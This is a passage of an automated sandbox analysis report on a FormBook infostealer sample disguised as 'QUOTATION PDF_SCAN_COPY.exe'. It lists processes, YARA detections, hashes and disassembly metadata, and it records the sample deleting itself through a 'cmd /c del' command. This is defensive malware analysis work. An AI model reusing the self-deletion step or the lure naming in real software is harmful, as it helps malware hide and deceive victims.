                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.834839904.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.834839904.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.834839904.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low

                                General

                                Target ID:13
                                Start time:12:06:56
                                Start date:31/01/2022
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Explorer.EXE
                                Imagebase:0x7ff6fee60000
                                File size:3933184 bytes
                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.775484148.000000000DADA000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.775484148.000000000DADA000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.775484148.000000000DADA000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.794471211.000000000DADA000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.794471211.000000000DADA000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.794471211.000000000DADA000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:high

                                General

                                Target ID:19
                                Start time:12:07:33
                                Start date:31/01/2022
                                Path:C:\Windows\SysWOW64\wlanext.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\wlanext.exe
                                Imagebase:0x8c0000
                                File size:78848 bytes
                                MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.981277393.0000000003270000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.981277393.0000000003270000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.981277393.0000000003270000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.980171637.0000000000950000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.980171637.0000000000950000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.980171637.0000000000950000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.980875419.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.980875419.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.980875419.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:moderate

                                General

                                Target ID:21
                                Start time:12:07:38
                                Start date:31/01/2022
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:/c del "C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe"
                                Imagebase:0x11d0000
                                File size:232960 bytes
                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Target ID:22
                                Start time:12:07:39
                                Start date:31/01/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff724c50000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Target ID:26
                                Start time:12:08:12
                                Start date:31/01/2022
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
                                Imagebase:0x7ff6fee60000
                                File size:3933184 bytes
                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:10.2%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:97
                                  Total number of Limit Nodes:11
                                  execution_graph 11478 11640d0 11479 11640e2 11478->11479 11485 1164120 11479->11485 11490 11641e0 11479->11490 11482 116410d 11487 116412a 11485->11487 11499 11642d0 11487->11499 11503 11642e0 11487->11503 11491 1164205 11490->11491 11493 11642d0 CreateActCtxA 11491->11493 11494 11642e0 CreateActCtxA 11491->11494 11492 11640ee 11495 1163c64 11492->11495 11493->11492 11494->11492 11496 1163c6f 11495->11496 11511 11651a4 11496->11511 11498 1166a3b 11498->11482 11501 1164307 11499->11501 11500 11643e4 11500->11500 11501->11500 11507 1163de8 11501->11507 11505 1164307 11503->11505 11504 11643e4 11505->11504 11506 1163de8 CreateActCtxA 11505->11506 11506->11504 11508 1165370 CreateActCtxA 11507->11508 11510 1165433 11508->11510 11512 11651af 11511->11512 11515 1165850 11512->11515 11514 1166b75 11514->11498 11516 116585b 11515->11516 11519 1165880 11516->11519 11518 1166c5a 11518->11514 11520 116588b 11519->11520 11523 11658b0 11520->11523 11522 1166d4a 11522->11518 11525 11658bb 11523->11525 11524 116749c 11524->11522 11525->11524 11527 116b4f8 11525->11527 11528 116b529 11527->11528 11529 116b54d 11528->11529 11532 116b6aa 11528->11532 11536 116b6b8 11528->11536 11529->11524 11533 116b6b9 11532->11533 11534 116b6ff 11533->11534 11540 116a16c 11533->11540 11534->11529 11537 116b6c5 11536->11537 11538 116b6ff 11537->11538 11539 116a16c 2 API calls 11537->11539 11538->11529 11539->11538 11541 116a177 11540->11541 11543 116c3f8 11541->11543 11544 116bf94 11541->11544 11543->11543 11545 116bf9f 11544->11545 11546 11658b0 2 API calls 11545->11546 11547 116c467 11545->11547 11546->11547 11550 116e214 11547->11550 11551 116c4a0 11550->11551 11552 116e22d 11550->11552 11551->11543 11554 116e662 LoadLibraryExW GetModuleHandleW 11552->11554 11555 116e668 LoadLibraryExW GetModuleHandleW 11552->11555 11553 116e265 11554->11553 11555->11553 11556 116b7d0 GetCurrentProcess 11557 116b843 11556->11557 11558 116b84a GetCurrentThread 11556->11558 11557->11558 11559 116b887 GetCurrentProcess 11558->11559 11560 116b880 11558->11560 11561 116b8bd 11559->11561 11560->11559 11562 116b8e5 GetCurrentThreadId 11561->11562 11563 116b916 11562->11563 11564 116fe38 11565 116fea0 CreateWindowExW 11564->11565 11567 116ff5c 11565->11567 11568 11693d8 11572 11694d0 11568->11572 11580 11694bf 11568->11580 11569 11693e7 11573 11694e3 11572->11573 11574 11694fb 11573->11574 11588 1169758 11573->11588 11592 1169748 11573->11592 11574->11569 11575 11694f3 11575->11574 11576 11696f8 GetModuleHandleW 11575->11576 11577 1169725 11576->11577 11577->11569 11581 11694e3 11580->11581 11582 11694fb 11581->11582 11586 1169758 LoadLibraryExW 11581->11586 11587 1169748 LoadLibraryExW 11581->11587 11582->11569 11583 11694f3 11583->11582 11584 11696f8 GetModuleHandleW 11583->11584 11585 1169725 11584->11585 11585->11569 11586->11583 11587->11583 11589 116976c 11588->11589 11591 1169791 11589->11591 11596 1168840 11589->11596 11591->11575 11593 116976c 11592->11593 11594 1169791 11593->11594 11595 1168840 LoadLibraryExW 11593->11595 11594->11575 11595->11594 11598 1169938 LoadLibraryExW 11596->11598 11599 11699b1 11598->11599 11599->11591 11600 116b9f8 DuplicateHandle 11601 116ba8e 11600->11601

                                  Executed Functions

                                  Function 0116E6B0 Relevance: .3, Instructions: 315COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 594 116e6b0-116e827 615 116e832-116e85d 594->615 616 116e863-116ec0b 615->616 617 116ec0c-116efb4 615->617
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.745354782.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_1160000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 648584de4ec1429db763322b85660d38ea3b950a0e41d33580144910c9ac1dbd
                                  • Instruction ID: 502f4831401f26ffd42fa6e50a350b5640575ffa78fa6cb5811eb917ec7b495d
                                  • Opcode Fuzzy Hash: 648584de4ec1429db763322b85660d38ea3b950a0e41d33580144910c9ac1dbd
                                  • Instruction Fuzzy Hash: 9C12A9F14117468BE3BACF65E4981893B63B745328B50422AD2763FAD9D7BC11CACF48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0116E6A0 Relevance: .2, Instructions: 224COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.745354782.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_1160000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b245084ad95224c15b5fcc1ea764afa8d1844947b38434812811978063b99b25
                                  • Instruction ID: 731d3aea71341e75f62fb54f98b8436ac760fae8389d5e0a0a39b22e7bb2744b
                                  • Opcode Fuzzy Hash: b245084ad95224c15b5fcc1ea764afa8d1844947b38434812811978063b99b25
                                  • Instruction Fuzzy Hash: C9C11DB18117458BE7AADF65E8981893BB3FB45328F50432AD1717B6D8D7B810CACF48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0116B7C2 Relevance: 6.1, APIs: 4, Instructions: 123threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 0116B830
                                  • GetCurrentThread.KERNEL32 ref: 0116B86D
                                  • GetCurrentProcess.KERNEL32 ref: 0116B8AA
                                  • GetCurrentThreadId.KERNEL32 ref: 0116B903
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.745354782.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_1160000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 28c5d5b820ef2b3ca842c7293df3b9082ec6db15b5213887358585add0a6e4bb
                                  • Instruction ID: e9429f104e3e247a7a64d6d74529de5fc985e0699e9cd1993219da1097a10a10
                                  • Opcode Fuzzy Hash: 28c5d5b820ef2b3ca842c7293df3b9082ec6db15b5213887358585add0a6e4bb
                                  • Instruction Fuzzy Hash: B75156B0904649CFDB14DFAAD648BEEBBF8BF48304F248469D009AB250D7396845CB65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0116B7D0 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 0116B830
                                  • GetCurrentThread.KERNEL32 ref: 0116B86D
                                  • GetCurrentProcess.KERNEL32 ref: 0116B8AA
                                  • GetCurrentThreadId.KERNEL32 ref: 0116B903
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.745354782.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_1160000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 16ac1a1d7f8579a9e50ed1c4a2d93b1d8543b464d9e22f5787cef5cb50f32bf3
                                  • Instruction ID: ffb1f5f249dc5b4051526be5cf36a5d6bcb1b46838935b2a58d2d937d4b22140
                                  • Opcode Fuzzy Hash: 16ac1a1d7f8579a9e50ed1c4a2d93b1d8543b464d9e22f5787cef5cb50f32bf3
                                  • Instruction Fuzzy Hash: A15145B0900649CFEB14DFAAD648BEEBBF8FF48304F248469E419A7350D7396845CB65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 011694D0 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 39 11694d0-11694d8 40 11694e3-11694e5 39->40 41 11694de call 11671b4 39->41 42 11694e7 40->42 43 11694fb-11694ff 40->43 41->40 92 11694ed call 1169758 42->92 93 11694ed call 1169748 42->93 44 1169513-1169554 43->44 45 1169501-116950b 43->45 50 1169556-116955e 44->50 51 1169561-116956f 44->51 45->44 46 11694f3-11694f5 46->43 49 1169630-11696f0 46->49 87 11696f2-11696f5 49->87 88 11696f8-1169723 GetModuleHandleW 49->88 50->51 53 1169593-1169595 51->53 54 1169571-1169576 51->54 55 1169598-116959f 53->55 56 1169581 54->56 57 1169578-116957f call 11687e8 54->57 61 11695a1-11695a9 55->61 62 11695ac-11695b3 55->62 58 1169583-1169591 56->58 57->58 58->55 61->62 63 11695b5-11695bd 62->63 64 11695c0-11695c9 call 11687f8 62->64 63->64 69 11695d6-11695db 64->69 70 11695cb-11695d3 64->70 72 11695dd-11695e4 69->72 73 11695f9-1169606 69->73 70->69 72->73 74 11695e6-11695f6 call 1168808 call 1168818 72->74 78 1169608-1169626 73->78 79 1169629-116962f 73->79 74->73 78->79 87->88 89 1169725-116972b 88->89 90 116972c-1169740 88->90 89->90 92->46 93->46
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 01169716
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.745354782.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_1160000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 342543ba3911a038214bbd81c70a9dc5fe8eafc9648ee5ab2561853473bd0483
                                  • Instruction ID: b88cf0d84a608877aeea52f08a8b4323581870943a12175ce11882f231cf2747
                                  • Opcode Fuzzy Hash: 342543ba3911a038214bbd81c70a9dc5fe8eafc9648ee5ab2561853473bd0483
                                  • Instruction Fuzzy Hash: 6F713970A00B098FD728DF6AD44479ABBF9FF88208F00892ED58AD7A50D775E855CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0116FE38 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 94 116fe38-116fe9e 95 116fea0-116fea6 94->95 96 116fea9-116feb0 94->96 95->96 97 116feb2-116feb8 96->97 98 116febb-116ff5a CreateWindowExW 96->98 97->98 100 116ff63-116ff9b 98->100 101 116ff5c-116ff62 98->101 105 116ff9d-116ffa0 100->105 106 116ffa8 100->106 101->100 105->106
                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0116FF4A
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.745354782.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_1160000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 9755327bdf8c04bc14dfb17d6fc5f989bd81d5634655232abd21fbd8d3e6916d
                                  • Instruction ID: 9f89b6a5690fc76d9f2415a0b6b36e6af18f973a6f965e5cfdb74fc014a045fc
                                  • Opcode Fuzzy Hash: 9755327bdf8c04bc14dfb17d6fc5f989bd81d5634655232abd21fbd8d3e6916d
                                  • Instruction Fuzzy Hash: BD41CFB1D00309DFDB14CF9AD884ADEBFB5BF48314F24812AE819AB210D7759845CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 01163DE8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 107 1163de8-1165431 CreateActCtxA 110 1165433-1165439 107->110 111 116543a-1165494 107->111 110->111 118 1165496-1165499 111->118 119 11654a3-11654a7 111->119 118->119 120 11654b8 119->120 121 11654a9-11654b5 119->121 123 11654b9 120->123 121->120 123->123
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 01165421
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.745354782.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_1160000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 68a87bbb0c369b35f23aaca02c5ff4412a80f208139487a3813bbf7f0cd79139
                                  • Instruction ID: 1f39fe60392ec246931271810b87af769f8a673af6c15d4f7c8d670d548173b0
                                  • Opcode Fuzzy Hash: 68a87bbb0c369b35f23aaca02c5ff4412a80f208139487a3813bbf7f0cd79139
                                  • Instruction Fuzzy Hash: 9F41F370D0461CCFDB24DFAAC844BDDBBB9BF49309F608469D408AB251E7B66946CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0116536F Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 124 116536f-1165431 CreateActCtxA 126 1165433-1165439 124->126 127 116543a-1165494 124->127 126->127 134 1165496-1165499 127->134 135 11654a3-11654a7 127->135 134->135 136 11654b8 135->136 137 11654a9-11654b5 135->137 139 11654b9 136->139 137->136 139->139
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 01165421
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.745354782.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_1160000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: ea09828ae6c20bb1a529601bbd29d4dc041733b4626bf42658e1873e4eaf65af
                                  • Instruction ID: 68b8fec5a1ad963e8f22f91a48f9e7e29216a6a608039f6ec759325d1b235e38
                                  • Opcode Fuzzy Hash: ea09828ae6c20bb1a529601bbd29d4dc041733b4626bf42658e1873e4eaf65af
                                  • Instruction Fuzzy Hash: F041E271D04618CFDB24DFAAC884BDDBBB9BF49309F208469D408AB251EB756946CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0116B9F0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 140 116b9f0-116ba8c DuplicateHandle 141 116ba95-116bab2 140->141 142 116ba8e-116ba94 140->142 142->141
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0116BA7F
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.745354782.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_1160000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: d79e2fe87aa81ba4a9c9f63efcdb2cf9f5b9ea09835649aac23cb607aa0fbc3a
                                  • Instruction ID: e5dc6951a7917985b9bd727beeef75285a1119456fb4ea45646de4f05c6f243e
                                  • Opcode Fuzzy Hash: d79e2fe87aa81ba4a9c9f63efcdb2cf9f5b9ea09835649aac23cb607aa0fbc3a
                                  • Instruction Fuzzy Hash: 9721E4B5900209DFDB00CFA9D584ADEBBF9FB58314F14842AE914A7350D379A954CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0116B9F8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 145 116b9f8-116ba8c DuplicateHandle 146 116ba95-116bab2 145->146 147 116ba8e-116ba94 145->147 147->146
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0116BA7F
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.745354782.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_1160000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 01b5b076c43c8919d2b553ca3b5e23577ce953d5b554a826c37200953f1f3820
                                  • Instruction ID: a94b0f5ea3c837ff326b702e30cd3a8d788b5ad95cb49e1c83a54cc557c4b90e
                                  • Opcode Fuzzy Hash: 01b5b076c43c8919d2b553ca3b5e23577ce953d5b554a826c37200953f1f3820
                                  • Instruction Fuzzy Hash: FA21C4B59002099FDB10CF9AD584ADEFBF8FB48324F14842AE914A7350D379A954CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 01168840 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 150 1168840-1169978 152 1169980-11699af LoadLibraryExW 150->152 153 116997a-116997d 150->153 154 11699b1-11699b7 152->154 155 11699b8-11699d5 152->155 153->152 154->155
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01169791,00000800,00000000,00000000), ref: 011699A2
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.745354782.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_1160000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: c7376f5eaf3bac2c4cd70664ebd15656f5fc8225cf4264c4272aa41f98ab4673
                                  • Instruction ID: bf37f6a7889e45480b18e7db396b00265eb90341f6ec8cdf1e11fec9f2b3b51a
                                  • Opcode Fuzzy Hash: c7376f5eaf3bac2c4cd70664ebd15656f5fc8225cf4264c4272aa41f98ab4673
                                  • Instruction Fuzzy Hash: 0A1114B6900209DFDB14CF9AD444BEEFBF8EB98314F14842AD919A7200D379A545CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 011696B0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 158 11696b0-11696f0 159 11696f2-11696f5 158->159 160 11696f8-1169723 GetModuleHandleW 158->160 159->160 161 1169725-116972b 160->161 162 116972c-1169740 160->162 161->162
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 01169716
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.745354782.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_1160000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: f310adfdcf26314f527193772ba2ea742a6dea45cd90a7011012d729875ab756
                                  • Instruction ID: b2c1d5afacf5cec2f958bd4b7897e44eb0c34547b5cc6aae452eae6b5cb93667
                                  • Opcode Fuzzy Hash: f310adfdcf26314f527193772ba2ea742a6dea45cd90a7011012d729875ab756
                                  • Instruction Fuzzy Hash: 4E1113B5C006498FDB14CF9AD444BDEFBF8EF48224F14846AD429B7200D379A545CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010CD01C Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.745216140.00000000010CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010CD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_10cd000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c4faaf3f58f600b9ad57a63352b567bed9e16f04b7516636946244bf98e3d40f
                                  • Instruction ID: d246d97ae3bc57a1c8f75d31f9db75f7f5e74435cb01ca0e8f8a274e0daf5dbd
                                  • Opcode Fuzzy Hash: c4faaf3f58f600b9ad57a63352b567bed9e16f04b7516636946244bf98e3d40f
                                  • Instruction Fuzzy Hash: 9F21F171504204DFCB11CF98D8C4B1ABBA5FB84654F30C9BDE88A4B246C336D847CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010CD1D4 Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.745216140.00000000010CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010CD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_10cd000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 910c3b3358170d4f944ea22c255cf941d232ec17860ae382f6ea604b4d5f8c3e
                                  • Instruction ID: 267baf1120a09f6d8b0cfc5875ad995d48e6b243dc800f5b9b711693f36784b3
                                  • Opcode Fuzzy Hash: 910c3b3358170d4f944ea22c255cf941d232ec17860ae382f6ea604b4d5f8c3e
                                  • Instruction Fuzzy Hash: AB21D371504204EFDB01DF94D9C4B2EBBA6FB94724F24C9BDE8894B242C736D846CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010CD006 Relevance: .1, Instructions: 63COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.745216140.00000000010CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010CD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_10cd000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 11ac99e6a58103c42011d88cc6c1c4b7d9aa8b3c6887768bb8487ad49d07e9be
                                  • Instruction ID: 6c172f1fbe6c79a81719625a16c32535508a1578a5e67c14024e015a4cc461ae
                                  • Opcode Fuzzy Hash: 11ac99e6a58103c42011d88cc6c1c4b7d9aa8b3c6887768bb8487ad49d07e9be
                                  • Instruction Fuzzy Hash: A62183754083809FCB02CF58D994715BFB1EB46614F28C5EAD8858B297C33A9856CBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010CD1CF Relevance: .1, Instructions: 53COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.745216140.00000000010CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010CD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_10cd000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ad2a8cfca3367af31ed8fccdba65c6857044cb1be902d9aeec9971aaaa20cc2e
                                  • Instruction ID: 3de0abddb30768a3446753a67d46d2e43daa6bf5700318248ce71ce13340fac6
